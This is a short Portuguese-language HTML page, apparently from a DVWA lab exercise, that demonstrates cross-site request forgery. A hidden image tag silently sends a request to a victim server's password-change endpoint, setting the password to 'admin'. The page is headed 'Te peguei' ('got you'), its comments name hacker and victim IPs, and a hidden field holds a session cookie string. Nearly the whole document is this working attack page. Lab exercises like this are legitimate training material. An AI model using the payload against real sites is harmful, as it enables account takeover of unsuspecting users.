CSRF [exemplo]

1. <html>
2.     <body>
3.         <h1> Te peguei ;)</h1>
4.  
5.         <--! Servidor hacker: 192.168.0.16>
6.         <--! Servidor da vitima: 192.168.0.19>
7.         <--! Validacao: /dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change">
8.  
9.         <img style="display:none" src="http://192.168.0.19/dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change" alt="">
10.         <input type="hidden" name="_token" value="security=low; PHPSESSID=k7q67pvdrl0hjgkgea285ukih0; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada">
11.     </body>
12. </html>